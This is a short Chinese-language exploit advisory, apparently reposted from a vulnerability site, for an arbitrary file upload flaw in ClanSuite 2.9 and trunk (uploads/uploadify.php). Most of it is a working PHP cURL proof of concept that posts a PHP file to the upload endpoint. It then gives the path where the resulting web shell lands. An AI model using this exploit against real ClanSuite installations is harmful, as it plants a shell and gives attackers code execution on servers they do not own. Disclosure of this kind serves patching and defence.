标题: ClanSuite 2.9 Arbitrary File Upload
发现者: Adrien Thierry
程序开发商
下载地址 : https://github.com/jakoch/Clansuite
影响版本: 2.9 and Trunk Revision 6400
缺陷地址 : uploads/uploadify.php
测试方法
<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";
$c = curl_init(" www.2cto.com /uploads/uploadify.php"); // Version 2.9
$c = curl_init(" www.2cto.com /application/uploads/uploadify.php"); // Version trunk
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$u",
'name'=>"info.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>
shell位置:
/uploads/temps/info.php
或者 /application/uploads/temps/info.php
,涛涛电脑知识网,涛涛电脑知识网